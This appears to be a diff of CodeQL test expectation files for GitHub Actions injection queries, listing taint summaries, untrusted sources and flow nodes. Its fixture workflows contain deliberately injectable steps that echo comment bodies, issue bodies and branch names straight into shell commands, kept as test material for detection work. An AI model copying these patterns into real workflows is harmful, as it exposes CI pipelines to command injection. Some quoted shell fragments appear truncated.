| input.aws-secret-access-key | env.AWS_SECRET_ACCESS_KEY | taint | manual | -| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | secret.AWS_SECRET_ACCESS_KEY | taint | manual | -| aws-actions/configure-aws-credentials | * | input.aws-session-token | env.AWS_SESSION_TOKEN | taint | manual | -| aws-actions/configure-aws-credentials | * | input.aws-session-token | secret.AWS_SESSION_TOKEN | taint | manual | -| aws-powertools/powertools-lambda-python | * | input.artifact_name_prefix | output.artifact_name | taint | manual | -| bobheadxi/deployments | * | input.env | output.env | taint | manual | -| bufbuild/buf-breaking-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | -| bufbuild/buf-lint-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | -| cachix/cachix-action | * | input.signingKey | env.CACHIX_SIGNING_KEY | taint | manual | -| cloudposse/github-action-matrix-outputs-write/.github/workflows/setup-test.yml | * | input.matrix-key | output.result | taint | manual | -| coursier/cache-action | * | input.path | env.COURSIER_CACHE | taint | manual | -| crazy-max/ghaction-import-gpg | * | input.fingerprint | output.fingerprint | taint | manual | -| csexton/release-asset-action | * | input.release-url | output.url | taint | manual | -| delaguardo/setup-clojure | * | input.boot | env.BOOT_VERSION | taint | manual | -| drawpile/drawpile | * | input.cache_key | output.cache_key | taint | manual | -| drawpile/drawpile | * | input.path | output.path | taint | manual | -| element-hq/element-desktop/.github/workflows/build_prepare.yaml | * | input.deploy | output.deploy | taint | manual | -| envoyproxy/envoy/.github/workflows/_load.yml | * | input.check-name | output.check-name | taint | manual | -| envoyproxy/envoy/.github/workflows/_load.yml | * | input.run-id | output.run-id | taint | manual | -| flagsmith/flagsmith | * | input.aws_ecr_repository_arn | output.image | taint | manual | -| frabert/replace-string-action | * | 
input.replace-with | output.replaced | taint | manual | -| frabert/replace-string-action | * | input.string | output.replaced | taint | manual | -| game-ci/unity-test-runner | * | input.artifactsPath | output.artifactsPath | taint | manual | -| getsentry/action-release | * | input.version | output.version | taint | manual | -| getsentry/action-release | * | input.version_prefix | output.version | taint | manual | -| github/codeql-action | * | input.output | output.sarif-output | taint | manual | -| gradle/gradle-build-action | * | input.build-scan-terms-of-service-agree | env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE | taint | manual | -| gradle/gradle-build-action | * | input.build-scan-terms-of-service-url | env.BUILD_SCAN_TERMS_OF_SERVICE_URL | taint | manual | -| gradle/gradle-build-action | * | input.cache-encryption-key | env.GRADLE_ENCRYPTION_KEY | taint | manual | -| hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml | * | input.version | output.docker-image | taint | manual | -| hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml | * | input.version | output.docker-image-tag | taint | manual | -| hashicorp/vault | * | input.vault-binary-path | output.vault-binary-path | taint | manual | -| hashicorp/vault | * | input.vault-version | output.vault-version | taint | manual | -| hashicorp/vault/.github/workflows/build-artifacts-ce.yml | * | input.vault-revision | output.testable-containers | taint | manual | -| hashicorp/vault/.github/workflows/build-artifacts-ce.yml | * | input.vault-version-package | output.testable-packages | taint | manual | -| haya14busa/action-cond | * | input.if_false | output.value | taint | manual | -| haya14busa/action-cond | * | input.if_true | output.value | taint | manual | -| hexlet/project-action | * | input.mount-path | env.PWD | taint | manual | -| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.project | taint | manual | -| 
hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.repo_name | taint | manual | -| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.repo_url | taint | manual | -| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.stage | output.release_stage | taint | manual | -| jhipster/generator-jhipster | * | input.skip-workflow | output.skip-workflow | taint | manual | -| jsdaniell/create-json | * | input.dir | output.successfully | taint | manual | -| jsdaniell/create-json | * | input.json | output.successfully | taint | manual | -| jsdaniell/create-json | * | input.name | output.successfully | taint | manual | -| jwalton/gh-ecr-push | * | input.image | output.imageUrl | taint | manual | -| kubeshop/botkube/.github/workflows/process-chart.yml | * | input.next-version | output.new-version | taint | manual | -| larsoner/circleci-artifacts-redirector-action | * | input.artifact-path | output.url | taint | manual | -| linkerd/linkerd2 | * | input.component | output.image | taint | manual | -| linkerd/linkerd2 | * | input.docker-registry | output.image | taint | manual | -| linkerd/linkerd2 | * | input.tag | output.image | taint | manual | -| mad9000/actions-find-and-replace-string | * | input.replace | output.value | taint | manual | -| mad9000/actions-find-and-replace-string | * | input.source | output.value | taint | manual | -| mattdavis0351/actions | * | input.image-name | output.imageUrl | taint | manual | -| mattdavis0351/actions | * | input.tag | output.imageUrl | taint | manual | -| metro-digital/setup-tools-for-waas | * | input.gcp_sa_key | env.GCLOUD_PROJECT | taint | manual | -| mishakav/pytest-coverage-comment | * | input.multiple-files | output.summaryReport | taint | manual | -| mymindstorm/setup-emsdk | * | input.actions-cache-folder | env.EMSDK | taint | manual | -| neondatabase/neon/.github/workflows/build-build-tools-image.yml | * | input.image-tag | output.image | taint | 
manual | -| neondatabase/neon/.github/workflows/build-build-tools-image.yml | * | input.image-tag | output.image-tag | taint | manual | -| novuhq/novu | * | input.docker_name | output.image | taint | manual | -| philosowaffle/peloton-to-garmin | * | input.os | output.artifact_name | taint | manual | -| ruby/setup-ruby | * | input.ruby-version | output.ruby-prefix | taint | manual | -| salsify/action-detect-and-tag-new-version | * | input.tag-template | output.tag | taint | manual | -| shallwefootball/upload-s3-action | * | input.destination_dir | output.object_key | taint | manual | -| shogo82148/actions-setup-perl | * | input.working-directory | env.PERL5LIB | taint | manual | -| streetsidesoftware/cspell | * | input.value | output.value | taint | manual | -| streetsidesoftware/cspell/.github/workflows/reuseable-load-integrations-repo-list.yml | * | input.ref | output.ref | taint | manual | -| suisei-cn/actions-download-file | * | input.filename | output.filename | taint | manual | -| tencent/hippy/.github/workflows/reuse_approve_checks_run.yml | * | input.pull_request_head_sha | output.pull_request_head_sha | taint | manual | -| tencent/hippy/.github/workflows/reuse_approve_checks_run.yml | * | input.pull_request_number | output.pull_request_number | taint | manual | -| timheuer/base64-to-file | * | input.fileDir | output.filePath | taint | manual | -| timheuer/base64-to-file | * | input.fileName | output.filePath | taint | manual | -| zitadel/zitadel/.github/workflows/container.yml | * | input.build_image_name | output.build_image | taint | manual | -calls -| .github/workflows/test.yml:11:9:15:6 | Uses Step | actions/checkout | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | tj-actions/changed-files | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | mad9000/actions-find-and-replace-string | -needs -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | -testNormalizeExpr -| foo['bar'] == baz | foo.bar == baz | -| 
github.event.pull_request.user["login"] | github.event.pull_request.user.login | -| github.event.pull_request.user['login'] | github.event.pull_request.user.login | -| github.event.pull_request['user']['login'] | github.event.pull_request.user.login | -writeToGitHubEnv -| id1 | $(> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | | .github/workflows/test.yml:1:1:40:53 | enter on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push | 
@@ -295,37 +306,51 @@ cfgNodes | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | dfNodes | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | | .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | | .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | | .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | | .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:13:14:15:46 
| LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | | .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | | .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | | .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | | .github/workflows/multiline.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| 
.github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | @@ -335,11 +360,14 @@ dfNodes | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | argumentNodes | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | 
@@ -349,28 +377,39 @@ usesIds nodeLocations | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:5:5:21:47 | .github/workflows/expression_nodes.yml@5:5:21:47 | | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:9:8:6 | .github/workflows/expression_nodes.yml@7:9:8:6 | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:7:14:7:58 | .github/workflows/expression_nodes.yml@7:14:7:58 | | .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:27:7:58 | .github/workflows/expression_nodes.yml@7:27:7:58 | | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:9:10:6 | .github/workflows/expression_nodes.yml@8:9:10:6 | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:8:14:9:57 | .github/workflows/expression_nodes.yml@8:14:9:57 | | .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:9:25:9:56 | .github/workflows/expression_nodes.yml@9:25:9:56 | | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:9:13:6 | .github/workflows/expression_nodes.yml@10:9:13:6 | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:10:14:12:53 | .github/workflows/expression_nodes.yml@10:14:12:53 | | .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:11:25:11:56 | .github/workflows/expression_nodes.yml@11:25:11:56 | | .github/workflows/expression_nodes.yml:12:24:12:51 | 
github.event.issue.body | .github/workflows/expression_nodes.yml:12:24:12:51 | .github/workflows/expression_nodes.yml@12:24:12:51 | | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:9:16:6 | .github/workflows/expression_nodes.yml@13:9:16:6 | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:13:14:15:46 | .github/workflows/expression_nodes.yml@13:14:15:46 | | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:9:20:6 | .github/workflows/expression_nodes.yml@16:9:20:6 | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:16:14:19:57 | .github/workflows/expression_nodes.yml@16:14:19:57 | | .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:17:25:17:56 | .github/workflows/expression_nodes.yml@17:25:17:56 | | .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:18:24:18:51 | .github/workflows/expression_nodes.yml@18:24:18:51 | | .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:19:24:19:55 | .github/workflows/expression_nodes.yml@19:24:19:55 | | 
.github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:9:21:47 | .github/workflows/expression_nodes.yml@20:9:21:47 | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | .github/workflows/multiline.yml:9:5:33:14 | .github/workflows/multiline.yml@9:5:33:14 | | .github/workflows/multiline.yml:11:9:15:6 | Run Step | .github/workflows/multiline.yml:11:9:15:6 | .github/workflows/multiline.yml@11:9:15:6 | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:14:14:48 | .github/workflows/multiline.yml@11:14:14:48 | | .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:9:20:6 | .github/workflows/multiline.yml@15:9:20:6 | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:15:14:19:40 | .github/workflows/multiline.yml@15:14:19:40 | | .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:9:24:6 | .github/workflows/multiline.yml@20:9:24:6 | +| 
.github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:20:14:23:40 | .github/workflows/multiline.yml@20:14:23:40 | | .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:9:30:6 | .github/workflows/multiline.yml@24:9:30:6 | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:24:14:29:29 | .github/workflows/multiline.yml@24:14:29:29 | | .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:30:9:33:14 | .github/workflows/multiline.yml@30:9:33:14 | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:14:33:14 | .github/workflows/multiline.yml@30:14:33:14 | | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline.yml:32:13:32:39 | .github/workflows/multiline.yml@32:13:32:39 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | 
@@ -380,64 +419,67 @@ nodeLocations | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:19:9:26:6 | .github/workflows/test.yml@19:9:26:6 | | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:20:23:64 | .github/workflows/test.yml@23:20:23:64 | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:9:28:6 | .github/workflows/test.yml@26:9:28:6 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:27:14:27:63 | .github/workflows/test.yml@27:14:27:63 | | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:20:27:64 | .github/workflows/test.yml@27:20:27:64 | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:9:31:2 | .github/workflows/test.yml@28:9:31:2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:29:14:29:54 | .github/workflows/test.yml@29:14:29:54 | | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:15:29:55 | .github/workflows/test.yml@29:15:29:55 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:32:5:40:53 | .github/workflows/test.yml@32:5:40:53 | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:9:40:53 | .github/workflows/test.yml@39:9:40:53 | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:40:14:40:52 | .github/workflows/test.yml@40:14:40:52 | | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:20:40:53 | .github/workflows/test.yml@40:20:40:53 | scopes | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | 
.github/workflows/multiline.yml:1:1:33:14 | on: | | .github/workflows/test.yml:1:1:40:53 | on: push | sources -| ahmadnassri/action-changed-files | * | output.files | PR changed files | manual | -| ahmadnassri/action-changed-files | * | output.json | PR changed files | manual | -| amannn/action-semantic-pull-request | * | output.error_message | PR title | manual | -| cypress-io/github-action | * | env.GH_BRANCH | PR branch | manual | -| dawidd6/action-download-artifact | * | output.artifacts | Artifact details | manual | -| dorny/paths-filter | * | output.changes | PR changed files | manual | -| franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | PR body | manual | -| franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | PR title | manual | -| googlecloudplatform/magic-modules | * | output.changed-files | PR changed files | manual | -| jitterbit/get-changed-files | * | output.added | PR changed files | manual | -| jitterbit/get-changed-files | * | output.added_modified | PR changed files | manual | -| jitterbit/get-changed-files | * | output.all | PR changed files | manual | -| jitterbit/get-changed-files | * | output.deleted | PR changed files | manual | -| jitterbit/get-changed-files | * | output.modified | PR changed files | manual | -| jitterbit/get-changed-files | * | output.removed | PR changed files | manual | -| jitterbit/get-changed-files | * | output.renamed | PR changed files | manual | -| khan/pull-request-comment-trigger | * | output.comment_body | Comment body | manual | -| marocchino/on_artifact | * | output.* | Downloaded artifact | manual | -| puppeteer/puppeteer/.github/workflows/changed-packages.yml | * | output.changes | Changed files | manual | -| redhat-plumbers-in-action/download-artifact | * | output.* | Downloaded artifact | manual | -| tj-actions/branch-names | * | output.current_branch | PR current branch | manual | -| tj-actions/branch-names | * | output.head_ref_branch | PR head branch | manual | -| 
tj-actions/branch-names | * | output.ref_branch | Branch tirggering workflow run | manual | -| tj-actions/changed-files | * | output.added_files | PR changed files | manual | -| tj-actions/changed-files | * | output.all_changed_and_modified_files | PR changed files | manual | -| tj-actions/changed-files | * | output.all_changed_files | PR changed files | manual | -| tj-actions/changed-files | * | output.all_modified_files | PR changed files | manual | -| tj-actions/changed-files | * | output.all_old_new_renamed_files | PR changed files | manual | -| tj-actions/changed-files | * | output.changed_keys | PR changed files | manual | -| tj-actions/changed-files | * | output.copied_files | PR changed files | manual | -| tj-actions/changed-files | * | output.deleted_files | PR changed files | manual | -| tj-actions/changed-files | * | output.modified_files | PR changed files | manual | -| tj-actions/changed-files | * | output.modified_keys | PR changed files | manual | -| tj-actions/changed-files | * | output.other_changed_files | PR changed files | manual | -| tj-actions/changed-files | * | output.other_deleted_files | PR changed files | manual | -| tj-actions/changed-files | * | output.other_modified_files | PR changed files | manual | -| tj-actions/changed-files | * | output.renamed_files | PR changed files | manual | -| tj-actions/changed-files | * | output.type_changed_files | PR changed files | manual | -| tj-actions/changed-files | * | output.unknown_files | PR changed files | manual | -| tj-actions/changed-files | * | output.unmerged_files | PR changed files | manual | -| tj-actions/verify-changed-files | * | output.changed-files | PR changed files | manual | -| trilom/file-changes-action | * | output.files | PR changed files | manual | -| trilom/file-changes-action | * | output.files_added | PR changed files | manual | -| trilom/file-changes-action | * | output.files_modified | PR changed files | manual | -| trilom/file-changes-action | * | output.files_removed | 
PR changed files | manual | -| tzkhan/pr-update-action | * | output.headMatch | | manual | -| xt0rted/slash-command-action | * | output.command-arguments | | manual | +| ahmadnassri/action-changed-files | * | output.files | filename | manual | +| ahmadnassri/action-changed-files | * | output.json | json | manual | +| amannn/action-semantic-pull-request | * | output.error_message | text | manual | +| cypress-io/github-action | * | env.GH_BRANCH | branch | manual | +| dawidd6/action-download-artifact | * | output.artifacts | artifact | manual | +| dorny/paths-filter | * | output.changes | filename | manual | +| franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | text | manual | +| franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | title | manual | +| googlecloudplatform/magic-modules | * | output.changed-files | filename | manual | +| jitterbit/get-changed-files | * | output.added | filename | manual | +| jitterbit/get-changed-files | * | output.added_modified | filename | manual | +| jitterbit/get-changed-files | * | output.all | filename | manual | +| jitterbit/get-changed-files | * | output.deleted | filename | manual | +| jitterbit/get-changed-files | * | output.modified | filename | manual | +| jitterbit/get-changed-files | * | output.removed | filename | manual | +| jitterbit/get-changed-files | * | output.renamed | filename | manual | +| khan/pull-request-comment-trigger | * | output.comment_body | text | manual | +| marocchino/on_artifact | * | output.* | artifact | manual | +| puppeteer/puppeteer/.github/workflows/changed-packages.yml | * | output.changes | filename | manual | +| redhat-plumbers-in-action/download-artifact | * | output.* | artifact | manual | +| tj-actions/branch-names | * | output.current_branch | branch | manual | +| tj-actions/branch-names | * | output.head_ref_branch | branch | manual | +| tj-actions/branch-names | * | output.ref_branch | branch | manual | +| tj-actions/changed-files | * | output.added_files 
| filename | manual | +| tj-actions/changed-files | * | output.all_changed_and_modified_files | filename | manual | +| tj-actions/changed-files | * | output.all_changed_files | filename | manual | +| tj-actions/changed-files | * | output.all_modified_files | filename | manual | +| tj-actions/changed-files | * | output.all_old_new_renamed_files | filename | manual | +| tj-actions/changed-files | * | output.changed_keys | filename | manual | +| tj-actions/changed-files | * | output.copied_files | filename | manual | +| tj-actions/changed-files | * | output.deleted_files | filename | manual | +| tj-actions/changed-files | * | output.modified_files | filename | manual | +| tj-actions/changed-files | * | output.modified_keys | filename | manual | +| tj-actions/changed-files | * | output.other_changed_files | filename | manual | +| tj-actions/changed-files | * | output.other_deleted_files | filename | manual | +| tj-actions/changed-files | * | output.other_modified_files | filename | manual | +| tj-actions/changed-files | * | output.renamed_files | filename | manual | +| tj-actions/changed-files | * | output.type_changed_files | filename | manual | +| tj-actions/changed-files | * | output.unknown_files | filename | manual | +| tj-actions/changed-files | * | output.unmerged_files | filename | manual | +| tj-actions/verify-changed-files | * | output.changed-files | filename | manual | +| trilom/file-changes-action | * | output.files | filename | manual | +| trilom/file-changes-action | * | output.files_added | filename | manual | +| trilom/file-changes-action | * | output.files_modified | filename | manual | +| trilom/file-changes-action | * | output.files_removed | filename | manual | +| tzkhan/pr-update-action | * | output.headMatch | branch | manual | +| xt0rted/slash-command-action | * | output.command-arguments | text | manual | summaries | akhileshns/heroku-deploy | * | input.branch | output.status | taint | manual | | android-actions/setup-android | * | 
input.cmdline-tools-version | output.ANDROID_COMMANDLINE_TOOLS_VERSION | taint | manual |
diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml
index c3c94755efd6..8ca103cbb6a1 100644
--- a/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml
+++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml
@@ -9,5 +9,7 @@ jobs:
 steps:
 - name: Code Injection, do not report as ENV VAR INJ
